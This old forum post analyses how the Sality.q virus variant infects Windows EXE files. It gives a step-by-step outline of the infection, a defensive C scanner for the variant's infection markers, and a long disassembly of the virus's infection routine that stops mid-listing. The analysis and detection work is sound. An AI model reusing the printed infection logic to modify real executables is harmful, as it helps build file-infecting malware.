[Old post] [Original] [Virus analysis] Sality.q variant: analysis of its EXE infection method
Posted on: 2008-4-11 16:13
/* Sality.q variant: analysis of its EXE infection method
 * File name: vcmgcd32.dll
 * MD5: ae22ca9f11ade8e362254b452cc07f78
 * Packer: none
 * By Vincent.peng on 2008.04.08
 */
Debugging method:
Break on the CreateThread call whose start routine (Fun) is 10003FF0, then set EIP to 10003FF0.
I. Infection process analysis:
1 Save the file's attributes and timestamps.
2 Set the file attributes to ARCHIVE (20h).
3 Get the file size: only EXE files between 1000h and 1400000h bytes are infected.
4 Compute the file offset of the OEP.
5 Modify the PE header and section table:
1) Update NtHeaders->OptionalHeader.SizeOfImage and NtHeaders->FileHeader.NumberOfSections.
2) Add a new section header; the section name is the last character of the file name (without extension) combined with a string such as code, data, rdata, text or UPX.
6 Allocate a block of memory holding the original OEP bytes (7Bh bytes) and the new section's data, and encrypt it with a random factor.
7 Overwrite the 7Bh bytes at the original OEP with the self-decrypting stub (7Bh bytes).
8 Append the new section to the end of the file.
9 Restore the file's attributes and timestamps.
This variant has a bug: infected programs cannot run. After the infected file runs and decrypts itself, it never restores the original OEP bytes or jumps back to them.
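As an added example (not part of the original post, and not the virus's own code), here is a C scanner for the two static traces this procedure leaves in a file. The first is the PointerToLinenumbers field of the section holding the entry point set to 11h: the listing copies that section header to 1000E230, refuses files where the dword at 1000E24C (offset 1Ch of IMAGE_SECTION_HEADER, i.e. PointerToLinenumbers) is already non-zero, and writes 11h there in both infection paths, so the virus's own "already infected" mark doubles as a detection marker. The second is a trailing RWX code section (Characteristics E0000020) whose name follows the pattern in step 5 and whose raw data ends exactly at end of file. The function and indicator names, the sample-builder and the constructed header-only PE32 sample are mine; the name check accepts an optional leading dot because the listing formats the name with ".%c%s".

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Indicator bits returned by sality_q_indicators(). */
#define IND_OEP_MARKER 1u /* entry-point section has PointerToLinenumbers == 0x11 */
#define IND_TRAIL_SECT 2u /* last section: RWX code (0xE0000020), virus-style name, ends the file */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Name check: optional '.', one character taken from the host file name, then one of the
   suffixes the write-up lists (case-insensitive; the listing upper- or lower-cases the name). */
static int name_matches_pattern(const uint8_t *name8) {
    static const char *suffixes[] = { "code", "data", "rdata", "text", "upx" };
    char lower[9];
    for (int i = 0; i < 8; i++) lower[i] = (char)tolower(name8[i]);
    lower[8] = '\0';
    const char *body = lower;
    if (*body == '.') body++;
    if (strlen(body) < 2) return 0;
    body++; /* skip the character borrowed from the file name */
    for (size_t i = 0; i < sizeof suffixes / sizeof suffixes[0]; i++)
        if (strcmp(body, suffixes[i]) == 0) return 1;
    return 0;
}

/* Returns -1 if buf is not a PE32 image, otherwise a bitmask of IND_* values. */
int sality_q_indicators(const uint8_t *buf, size_t len) {
    if (len < 0x40 || rd16(buf) != 0x5A4D) return -1;
    uint32_t pe = rd32(buf + 0x3C);
    if ((uint64_t)pe + 24 > len || rd32(buf + pe) != 0x00004550) return -1;
    const uint8_t *fh = buf + pe + 4;                 /* IMAGE_FILE_HEADER */
    uint16_t nsec = rd16(fh + 2), optsz = rd16(fh + 16);
    const uint8_t *oh = fh + 20;                      /* IMAGE_OPTIONAL_HEADER32 */
    if (nsec == 0 || (uint64_t)pe + 24 + optsz + (uint64_t)nsec * 40 > len) return -1;
    if (optsz < 20 || rd16(oh) != 0x10B) return -1;
    uint32_t oep = rd32(oh + 16);                     /* AddressOfEntryPoint */
    const uint8_t *sec = oh + optsz;                  /* first IMAGE_SECTION_HEADER */
    unsigned ind = 0;
    for (uint16_t i = 0; i < nsec; i++) {
        const uint8_t *s = sec + i * 40;
        uint32_t vsize = rd32(s + 8), va = rd32(s + 12);
        uint32_t rawsz = rd32(s + 16), rawptr = rd32(s + 20);
        uint32_t linenum = rd32(s + 28), chars = rd32(s + 36);
        uint32_t span = vsize ? vsize : rawsz;
        /* The infector aborts when this field is non-zero and sets it to 0x11 afterwards. */
        if (oep >= va && oep < va + span && linenum == 0x11) ind |= IND_OEP_MARKER;
        if (i == nsec - 1 && chars == 0xE0000020u && (uint64_t)rawptr + rawsz == len &&
            name_matches_pattern(s)) ind |= IND_TRAIL_SECT;
    }
    return (int)ind;
}

/* Constructed header-only PE32 sample (no real code). infected=1 plants both indicators. */
size_t build_sample(uint8_t *buf, size_t cap, int infected) {
    memset(buf, 0, cap);
    buf[0] = 'M'; buf[1] = 'Z';
    wr32(buf + 0x3C, 0x80);
    memcpy(buf + 0x80, "PE\0\0", 4);
    uint8_t *fh = buf + 0x84, *oh = fh + 20, *sec = oh + 0xE0;
    wr16(fh, 0x014C); wr16(fh + 2, (uint16_t)(infected ? 3 : 2)); wr16(fh + 16, 0xE0);
    wr16(oh, 0x10B); wr32(oh + 16, 0x1010);           /* entry point inside .text */
    memcpy(sec, ".text\0\0\0", 8);
    wr32(sec + 8, 0x1000); wr32(sec + 12, 0x1000); wr32(sec + 16, 0x200); wr32(sec + 20, 0x400);
    wr32(sec + 36, 0x60000020);
    memcpy(sec + 40, ".data\0\0\0", 8);
    wr32(sec + 48, 0x1000); wr32(sec + 52, 0x2000); wr32(sec + 56, 0x200); wr32(sec + 60, 0x600);
    wr32(sec + 76, 0xC0000040);
    size_t end = 0x800;
    if (infected) {
        wr32(sec + 28, 0x11);                         /* marker on the entry-point section */
        uint8_t *s3 = sec + 80;                       /* appended section; host name ends in 't' */
        memcpy(s3, ".ttext\0\0", 8);
        wr32(s3 + 8, 0x100); wr32(s3 + 12, 0x3000); wr32(s3 + 16, 0x100); wr32(s3 + 20, 0x800);
        wr32(s3 + 36, 0xE0000020);
        end = 0x900;                                  /* raw data of the new section ends the file */
    }
    return end;
}

/* Builds a sample and scans it; used by main() and by the tests. */
int demo_scan(int infected) {
    static uint8_t buf[0x1000];
    size_t n = build_sample(buf, sizeof buf, infected);
    return sality_q_indicators(buf, n);
}

int main(void) {
    printf("clean sample: %d, infected sample: %d\n", demo_scan(0), demo_scan(1));
    return 0;
}
```

Either indicator on its own is weak (a linker can leave PointerToLinenumbers non-zero, and packers add RWX sections), so treat the pair as a triage hint that a sample deserves a closer look at the bytes at its entry point.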
II. Infection code:
10002020 $ 55 PUSH EBP
10002021 . 8BEC MOV EBP,ESP
10002023 . 6A FF PUSH -1
10002025 . 68 58110010 PUSH vcmgcd32.10001158
1000202A . 68 48460010 PUSH vcmgcd32.10004648 ; SEH handler installation
1000202F . 64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
10002035 . 50 PUSH EAX
10002036 . 64:8925 00000>MOV DWORD PTR FS:[0],ESP
1000203D . 81C4 08FFFFFF ADD ESP,-0F8
10002043 . 53 PUSH EBX
10002044 . 56 PUSH ESI
10002045 . 57 PUSH EDI
10002046 . 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP
10002049 . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
10002053 . C745 C4 00000>MOV DWORD PTR SS:[EBP-3C],0
1000205A . C785 10FFFFFF>MOV DWORD PTR SS:[EBP-F0],0
10002064 . C785 24FFFFFF>MOV DWORD PTR SS:[EBP-DC],0
1000206E . C785 18FFFFFF>MOV DWORD PTR SS:[EBP-E8],0
10002078 . C745 AC 00000>MOV DWORD PTR SS:[EBP-54],0
1000207F . C785 2CFFFFFF>MOV DWORD PTR SS:[EBP-D4],0
10002089 . C785 08FFFFFF>MOV DWORD PTR SS:[EBP-F8],0
10002093 . C745 E4 00000>MOV DWORD PTR SS:[EBP-1C],0
1000209A . C745 E0 00000>MOV DWORD PTR SS:[EBP-20],0
100020A1 . C745 CC 00500>MOV DWORD PTR SS:[EBP-34],5000
100020A8 . 66:C745 B4 00>MOV WORD PTR SS:[EBP-4C],0
100020AE . B9 1F000000 MOV ECX,1F
100020B3 . BE 286A0010 MOV ESI,vcmgcd32.10006A28
100020B8 . 8DBD 30FFFFFF LEA EDI,DWORD PTR SS:[EBP-D0]
100020BE . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
100020C0 . C645 DC 00 MOV BYTE PTR SS:[EBP-24],0
100020C4 . C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
100020CB . 833D 048B0010>CMP DWORD PTR DS:[10008B04],0
100020D2 . 74 47 JE SHORT vcmgcd32.1000211B
100020D4 . 68 04010000 PUSH 104 ; /WideBufSize = 104 (260.)
100020D9 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |WideCharBuf = vcmgcd32.1000E270
100020DE . 6A FF PUSH -1 ; |StringSize = FFFFFFFF (-1.)
100020E0 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
100020E3 . 50 PUSH EAX ; |StringToMap
100020E4 . 6A 00 PUSH 0 ; |Options = 0
100020E6 . 6A 00 PUSH 0 ; |CodePage = CP_ACP
100020E8 . FF15 98100010 CALL DWORD PTR DS:[<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar
100020EE . 68 70E20010 PUSH vcmgcd32.1000E270
100020F3 . 6A 00 PUSH 0
100020F5 . FF15 048B0010 CALL DWORD PTR DS:[10008B04] ; sfc_os.SfcIsFileProtected
100020FB . 85C0 TEST EAX,EAX
100020FD . 74 1C JE SHORT vcmgcd32.1000211B
100020FF . C785 00FFFFFF>MOV DWORD PTR SS:[EBP-100],0
10002109 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002110 . 8B85 00FFFFFF MOV EAX,DWORD PTR SS:[EBP-100]
10002116 . E9 3D0A0000 JMP vcmgcd32.10002B58
1000211B > 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
1000211E . 51 PUSH ECX ; /FileName
1000211F . FF15 3C100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
10002125 . 8945 D8 MOV DWORD PTR SS:[EBP-28],EAX
10002128 . 6A 20 PUSH 20 ; /FileAttributes = ARCHIVE
1000212A . 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] ; |
1000212D . 52 PUSH EDX ; |FileName
1000212E . FF15 94100010 CALL DWORD PTR DS:[<&KERNEL32.SetFileAttributesA>] ; \SetFileAttributesA
10002134 . 85C0 TEST EAX,EAX
10002136 . 75 1C JNZ SHORT vcmgcd32.10002154
10002138 . C785 FCFEFFFF>MOV DWORD PTR SS:[EBP-104],0
10002142 . C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
10002149 . 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104]
1000214F . E9 040A0000 JMP vcmgcd32.10002B58
10002154 > 6A 00 PUSH 0 ; /hTemplateFile = NULL
10002156 . 68 80000000 PUSH 80 ; |Attributes = NORMAL
1000215B . 6A 03 PUSH 3 ; |Mode = OPEN_EXISTING
1000215D . 6A 00 PUSH 0 ; |pSecurity = NULL
1000215F . 6A 00 PUSH 0 ; |ShareMode = 0
10002161 . 68 000000C0 PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
10002166 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] ; |
10002169 . 50 PUSH EAX ; |FileName
1000216A . FF15 6C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; \CreateFileA
10002170 . 8985 04FFFFFF MOV DWORD PTR SS:[EBP-FC],EAX
10002176 . 6A 00 PUSH 0 ; /pFileSizeHigh = NULL
10002178 . 8B8D 04FFFFFF MOV ECX,DWORD PTR SS:[EBP-FC] ; |
1000217E . 51 PUSH ECX ; |hFile
1000217F . FF15 68100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileSize>] ; \GetFileSize
10002185 . 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX
10002188 . 83BD 04FFFFFF>CMP DWORD PTR SS:[EBP-FC],-1
1000218F . 0F84 87090000 JE vcmgcd32.10002B1C
10002195 . 817D B8 00004>CMP DWORD PTR SS:[EBP-48],1400000
1000219C . 0F83 7A090000 JNB vcmgcd32.10002B1C
100021A2 . 817D B8 00100>CMP DWORD PTR SS:[EBP-48],1000
100021A9 . 0F86 6D090000 JBE vcmgcd32.10002B1C
100021AF . 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]
100021B2 . 8955 B0 MOV DWORD PTR SS:[EBP-50],EDX
100021B5 . 8D85 1CFFFFFF LEA EAX,DWORD PTR SS:[EBP-E4]
100021BB . 50 PUSH EAX ; /pLastWrite
100021BC . 8D4D BC LEA ECX,DWORD PTR SS:[EBP-44] ; |
100021BF . 51 PUSH ECX ; |pLastAccess
100021C0 . 8D55 D0 LEA EDX,DWORD PTR SS:[EBP-30] ; |
100021C3 . 52 PUSH EDX ; |pCreationTime
100021C4 . 8B85 04FFFFFF MOV EAX,DWORD PTR SS:[EBP-FC] ; |
100021CA . 50 PUSH EAX ; |hFile
100021CB . FF15 90100010 CALL DWORD PTR DS:[<&KERNEL32.GetFileTime>] ; \GetFileTime
100021D1 . 6A 00 PUSH 0 ; /MapName = NULL
100021D3 . 8B4D B8 MOV ECX,DWORD PTR SS:[EBP-48] ; |
100021D6 . 81C1 00500000 ADD ECX,5000 ; |
100021DC . 51 PUSH ECX ; |MaximumSizeLow
100021DD . 6A 00 PUSH 0 ; |MaximumSizeHigh = 0
100021DF . 6A 04 PUSH 4 ; |Protection = PAGE_READWRITE
100021E1 . 6A 00 PUSH 0 ; |pSecurity = NULL
100021E3 . 8B95 04FFFFFF MOV EDX,DWORD PTR SS:[EBP-FC] ; |
100021E9 . 52 PUSH EDX ; |hFile
100021EA . FF15 8C100010 CALL DWORD PTR DS:[<&KERNEL32.CreateFileMappingA>] ; \CreateFileMappingA
100021F0 . A3 10E20010 MOV DWORD PTR DS:[1000E210],EAX
100021F5 . 833D 10E20010>CMP DWORD PTR DS:[1000E210],0
100021FC . 0F84 C2080000 JE vcmgcd32.10002AC4
10002202 . 6A 00 PUSH 0 ; /MapSize = 0
10002204 . 6A 00 PUSH 0 ; |OffsetLow = 0
10002206 . 6A 00 PUSH 0 ; |OffsetHigh = 0
10002208 . 6A 02 PUSH 2 ; |AccessMode = FILE_MAP_WRITE
1000220A . A1 10E20010 MOV EAX,DWORD PTR DS:[1000E210] ; |
1000220F . 50 PUSH EAX ; |hMapObject => NULL
10002210 . FF15 7C100010 CALL DWORD PTR DS:[<&KERNEL32.MapViewOfFile>] ; \MapViewOfFile
10002216 . A3 94E60010 MOV DWORD PTR DS:[1000E694],EAX
1000221B . 833D 94E60010>CMP DWORD PTR DS:[1000E694],0 ; if a empty file
10002222 . 0F84 9C080000 JE vcmgcd32.10002AC4
10002228 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000222E . 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] ; point to pe offset
10002231 . 8995 0CFFFFFF MOV DWORD PTR SS:[EBP-F4],EDX
10002237 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
1000223D . 3B45 B8 CMP EAX,DWORD PTR SS:[EBP-48]
10002240 . 0F83 7E080000 JNB vcmgcd32.10002AC4
10002246 . 8B0D 94E60010 MOV ECX,DWORD PTR DS:[1000E694]
1000224C . 0FBE51 18 MOVSX EDX,BYTE PTR DS:[ECX+18] ; infected flag??
10002250 . 83FA 40 CMP EDX,40
10002253 . 0F8C 6B080000 JL vcmgcd32.10002AC4
10002259 . 68 D8000000 PUSH 0D8
1000225E . A1 94E60010 MOV EAX,DWORD PTR DS:[1000E694]
10002263 . 0385 0CFFFFFF ADD EAX,DWORD PTR SS:[EBP-F4]
10002269 . 50 PUSH EAX
1000226A . 68 10900010 PUSH vcmgcd32.10009010
1000226F . E8 2C250000 CALL vcmgcd32.100047A0
10002274 . 83C4 0C ADD ESP,0C
10002277 . 813D 10900010>CMP DWORD PTR DS:[10009010],4550
10002281 . 0F85 3D080000 JNZ vcmgcd32.10002AC4
10002287 . 33C9 XOR ECX,ECX
10002289 . 66:8B0D 28900>MOV CX,WORD PTR DS:[10009028] ; GetMagicNumber
10002290 . 81F9 0B010000 CMP ECX,10B
10002296 . 0F85 28080000 JNZ vcmgcd32.10002AC4
1000229C . 833D 38900010>CMP DWORD PTR DS:[10009038],0 ; GetOEP
100022A3 . 0F84 1B080000 JE vcmgcd32.10002AC4
100022A9 . 8B15 48900010 MOV EDX,DWORD PTR DS:[10009048] ; ?? GetSectionAlignment or OEP file offset
100022AF . 52 PUSH EDX ; /Arg2 => 00000000
100022B0 . 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; |
100022B3 . 50 PUSH EAX ; |Arg1
100022B4 . E8 B7FAFFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100022B9 . 83C4 08 ADD ESP,8
100022BC . 8945 CC MOV DWORD PTR SS:[EBP-34],EAX
100022BF . C785 14FFFFFF>MOV DWORD PTR SS:[EBP-EC],0
100022C9 . EB 0F JMP SHORT vcmgcd32.100022DA
100022CB > 8B8D 14FFFFFF MOV ECX,DWORD PTR SS:[EBP-EC]
100022D1 . 83C1 01 ADD ECX,1
100022D4 . 898D 14FFFFFF MOV DWORD PTR SS:[EBP-EC],ECX
100022DA > 33D2 XOR EDX,EDX
100022DC . 66:8B15 16900>MOV DX,WORD PTR DS:[10009016] ; GetNumberOfSections
100022E3 . 83EA 01 SUB EDX,1 ; sectionNum - 1
100022E6 . 3995 14FFFFFF CMP DWORD PTR SS:[EBP-EC],EDX
100022EC . 0F87 03010000 JA vcmgcd32.100023F5 ; > sectionNo then jmp
100022F2 . 6A 28 PUSH 28
100022F4 . 33C0 XOR EAX,EAX
100022F6 . 66:A1 2490001>MOV AX,WORD PTR DS:[10009024] ; sizeofOptionHeader
100022FC . 8B8D 0CFFFFFF MOV ECX,DWORD PTR SS:[EBP-F4]
10002302 . 03C8 ADD ECX,EAX
10002304 . 8B95 14FFFFFF MOV EDX,DWORD PTR SS:[EBP-EC]
1000230A . 6BD2 28 IMUL EDX,EDX,28
1000230D . 0315 94E60010 ADD EDX,DWORD PTR DS:[1000E694]
10002313 . 8D440A 18 LEA EAX,DWORD PTR DS:[EDX+ECX+18] ; GetSectionNameOffset
10002317 . 50 PUSH EAX
10002318 . 68 30E20010 PUSH vcmgcd32.1000E230
1000231D . E8 7E240000 CALL vcmgcd32.100047A0
10002322 . 83C4 0C ADD ESP,0C
10002325 . 83BD 14FFFFFF>CMP DWORD PTR SS:[EBP-EC],1
1000232C . 75 10 JNZ SHORT vcmgcd32.1000233E
1000232E . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002333 . 68 70E20010 PUSH vcmgcd32.1000E270 ; |String1 = vcmgcd32.1000E270
10002338 . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
1000233E > 8B0D 38900010 MOV ECX,DWORD PTR DS:[10009038]
10002344 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
1000234A . 72 5E JB SHORT vcmgcd32.100023AA
1000234C . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C] ; v.Offset
10002352 . 0315 38E20010 ADD EDX,DWORD PTR DS:[1000E238] ; v.Size
10002358 . 3915 38900010 CMP DWORD PTR DS:[10009038],EDX
1000235E . 73 4A JNB SHORT vcmgcd32.100023AA
10002360 . 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002367 . 74 41 JE SHORT vcmgcd32.100023AA
10002369 . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002370 . 74 38 JE SHORT vcmgcd32.100023AA
10002372 . A1 3CE20010 MOV EAX,DWORD PTR DS:[1000E23C]
10002377 . 8985 24FFFFFF MOV DWORD PTR SS:[EBP-DC],EAX
1000237D . 8B0D 44E20010 MOV ECX,DWORD PTR DS:[1000E244]
10002383 . 898D 18FFFFFF MOV DWORD PTR SS:[EBP-E8],ECX
10002389 . 8B15 38900010 MOV EDX,DWORD PTR DS:[10009038]
1000238F . 2B15 3CE20010 SUB EDX,DWORD PTR DS:[1000E23C]
10002395 . 0315 44E20010 ADD EDX,DWORD PTR DS:[1000E244]
1000239B . 8955 AC MOV DWORD PTR SS:[EBP-54],EDX
1000239E . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023A4 . 8985 28FFFFFF MOV DWORD PTR SS:[EBP-D8],EAX
100023AA > 8B8D 08FFFFFF MOV ECX,DWORD PTR SS:[EBP-F8]
100023B0 . 3B0D 3CE20010 CMP ECX,DWORD PTR DS:[1000E23C]
100023B6 . 73 15 JNB SHORT vcmgcd32.100023CD
100023B8 . 8B15 3CE20010 MOV EDX,DWORD PTR DS:[1000E23C]
100023BE . 8995 08FFFFFF MOV DWORD PTR SS:[EBP-F8],EDX
100023C4 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023CA . 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
100023CD > 8B8D 2CFFFFFF MOV ECX,DWORD PTR SS:[EBP-D4]
100023D3 . 3B0D 44E20010 CMP ECX,DWORD PTR DS:[1000E244]
100023D9 . 73 15 JNB SHORT vcmgcd32.100023F0
100023DB . 8B15 44E20010 MOV EDX,DWORD PTR DS:[1000E244]
100023E1 . 8995 2CFFFFFF MOV DWORD PTR SS:[EBP-D4],EDX
100023E7 . 8B85 14FFFFFF MOV EAX,DWORD PTR SS:[EBP-EC]
100023ED . 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
100023F0 >^ E9 D6FEFFFF JMP vcmgcd32.100022CB ; find OEP's section, Get number of section
100023F5 > 6A 28 PUSH 28
100023F7 . 33C9 XOR ECX,ECX
100023F9 . 66:8B0D 24900>MOV CX,WORD PTR DS:[10009024] ; SizeOfOptionHeader
10002400 . 8B95 0CFFFFFF MOV EDX,DWORD PTR SS:[EBP-F4]
10002406 . 03D1 ADD EDX,ECX
10002408 . 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
1000240B . 6BC0 28 IMUL EAX,EAX,28
1000240E . 0305 94E60010 ADD EAX,DWORD PTR DS:[1000E694]
10002414 . 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
10002418 . 51 PUSH ECX
10002419 . 68 30E20010 PUSH vcmgcd32.1000E230
1000241E . E8 7D230000 CALL vcmgcd32.100047A0
10002423 . 83C4 0C ADD ESP,0C
10002426 . 8B15 4C900010 MOV EDX,DWORD PTR DS:[1000904C]
1000242C . 52 PUSH EDX ; /Arg2 => 00000000
1000242D . A1 44E20010 MOV EAX,DWORD PTR DS:[1000E244] ; |
10002432 . 0305 40E20010 ADD EAX,DWORD PTR DS:[1000E240] ; |
10002438 . 50 PUSH EAX ; |Arg1
10002439 . E8 32F9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000243E . 83C4 08 ADD ESP,8
10002441 . 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
10002444 . C705 68900010>MOV DWORD PTR DS:[10009068],0
1000244E . 8B0D 48900010 MOV ECX,DWORD PTR DS:[10009048]
10002454 . 51 PUSH ECX ; /Arg2 => 00000000
10002455 . 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34] ; |
10002458 . 0315 60900010 ADD EDX,DWORD PTR DS:[10009060] ; |
1000245E . 52 PUSH EDX ; |Arg1
1000245F . E8 0CF9FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
10002464 . 83C4 08 ADD ESP,8
10002467 . A3 60900010 MOV DWORD PTR DS:[10009060],EAX
1000246C . A1 38900010 MOV EAX,DWORD PTR DS:[10009038]
10002471 . 2B85 24FFFFFF SUB EAX,DWORD PTR SS:[EBP-DC]
10002477 . 0385 18FFFFFF ADD EAX,DWORD PTR SS:[EBP-E8]
1000247D . 8985 18FFFFFF MOV DWORD PTR SS:[EBP-E8],EAX
10002483 . 68 30E20010 PUSH vcmgcd32.1000E230 ; /String2 = ""
10002488 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |String1 = vcmgcd32.100090E8
1000248D . FF15 80100010 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
10002493 . 68 E8900010 PUSH vcmgcd32.100090E8 ; /StringOrChar = ""
10002498 . FF15 20110010 CALL DWORD PTR DS:[<&USER32.CharUpperA>] ; \CharUpperA
1000249E . 833D 4CE20010>CMP DWORD PTR DS:[1000E24C],0
100024A5 . 0F85 19060000 JNZ vcmgcd32.10002AC4
100024AB . 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
100024AE . 030D 48900010 ADD ECX,DWORD PTR DS:[10009048]
100024B4 . 3B4D B8 CMP ECX,DWORD PTR SS:[EBP-48]
100024B7 . 0F86 07060000 JBE vcmgcd32.10002AC4
100024BD . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
100024C0 . 3B55 E0 CMP EDX,DWORD PTR SS:[EBP-20]
100024C3 . 0F85 FB050000 JNZ vcmgcd32.10002AC4
100024C9 . 813D 54E20010>CMP DWORD PTR DS:[1000E254],E0000020
100024D3 . 73 4B JNB SHORT vcmgcd32.10002520
100024D5 . A1 30610010 MOV EAX,DWORD PTR DS:[10006130]
100024DA . 50 PUSH EAX ; /Arg2 => 10006438 ASCII "TEXT"
100024DB . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024E0 . E8 DBECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024E5 . 83C4 08 ADD ESP,8
100024E8 . 85C0 TEST EAX,EAX
100024EA . 75 34 JNZ SHORT vcmgcd32.10002520
100024EC . 8B0D 34610010 MOV ECX,DWORD PTR DS:[10006134] ; vcmgcd32.10006440
100024F2 . 51 PUSH ECX ; /Arg2 => 10006440 ASCII "UPX"
100024F3 . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
100024F8 . E8 C3ECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
100024FD . 83C4 08 ADD ESP,8
10002500 . 85C0 TEST EAX,EAX
10002502 . 75 1C JNZ SHORT vcmgcd32.10002520
10002504 . 8B15 38610010 MOV EDX,DWORD PTR DS:[10006138] ; vcmgcd32.10006448
1000250A . 52 PUSH EDX ; /Arg2 => 10006448 ASCII "CODE"
1000250B . 68 E8900010 PUSH vcmgcd32.100090E8 ; |Arg1 = 100090E8
10002510 . E8 ABECFFFF CALL vcmgcd32.100011C0 ; \vcmgcd32.100011C0
10002515 . 83C4 08 ADD ESP,8
10002518 . 85C0 TEST EAX,EAX
1000251A . 0F84 EF000000 JE vcmgcd32.1000260F
10002520 > 833D 40E20010>CMP DWORD PTR DS:[1000E240],0
10002527 . 0F84 E2000000 JE vcmgcd32.1000260F
1000252D . 833D 38E20010>CMP DWORD PTR DS:[1000E238],0
10002534 . 0F84 D5000000 JE vcmgcd32.1000260F
1000253A . A1 40E20010 MOV EAX,DWORD PTR DS:[1000E240]
1000253F . 3B05 38E20010 CMP EAX,DWORD PTR DS:[1000E238]
10002545 . 72 17 JB SHORT vcmgcd32.1000255E
10002547 . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240]
1000254D . 2B0D 38E20010 SUB ECX,DWORD PTR DS:[1000E238]
10002553 . 034D CC ADD ECX,DWORD PTR SS:[EBP-34]
10002556 . 898D F8FEFFFF MOV DWORD PTR SS:[EBP-108],ECX
1000255C . EB 09 JMP SHORT vcmgcd32.10002567
1000255E > 8B55 CC MOV EDX,DWORD PTR SS:[EBP-34]
10002561 . 8995 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EDX
10002567 > A1 38E20010 MOV EAX,DWORD PTR DS:[1000E238]
1000256C . 0385 F8FEFFFF ADD EAX,DWORD PTR SS:[EBP-108]
10002572 . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
10002577 . 8B0D 4C900010 MOV ECX,DWORD PTR DS:[1000904C]
1000257D . 51 PUSH ECX ; /Arg2 => 00000000
1000257E . 8B15 40E20010 MOV EDX,DWORD PTR DS:[1000E240] ; |
10002584 . 0355 CC ADD EDX,DWORD PTR SS:[EBP-34] ; |
10002587 . 52 PUSH EDX ; |Arg1
10002588 . E8 E3F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
1000258D . 83C4 08 ADD ESP,8
10002590 . A3 40E20010 MOV DWORD PTR DS:[1000E240],EAX
10002595 . A1 48900010 MOV EAX,DWORD PTR DS:[10009048]
1000259A . 50 PUSH EAX ; /Arg2 => 00000000
1000259B . 8B0D 40E20010 MOV ECX,DWORD PTR DS:[1000E240] ; |
100025A1 . 51 PUSH ECX ; |Arg1 => 00000000
100025A2 . E8 C9F7FFFF CALL vcmgcd32.10001D70 ; \vcmgcd32.10001D70
100025A7 . 83C4 08 ADD ESP,8
100025AA . A3 38E20010 MOV DWORD PTR DS:[1000E238],EAX
100025AF . C705 54E20010>MOV DWORD PTR DS:[1000E254],E0000020
100025B9 . C705 4CE20010>MOV DWORD PTR DS:[1000E24C],11
100025C3 . 6A 28 PUSH 28
100025C5 . 68 30E20010 PUSH vcmgcd32.1000E230
100025CA . 33D2 XOR EDX,EDX
100025CC . 66:8B15 24900>MOV DX,WORD PTR DS:[10009024]
100025D3 . 8B85 0CFFFFFF MOV EAX,DWORD PTR SS:[EBP-F4]
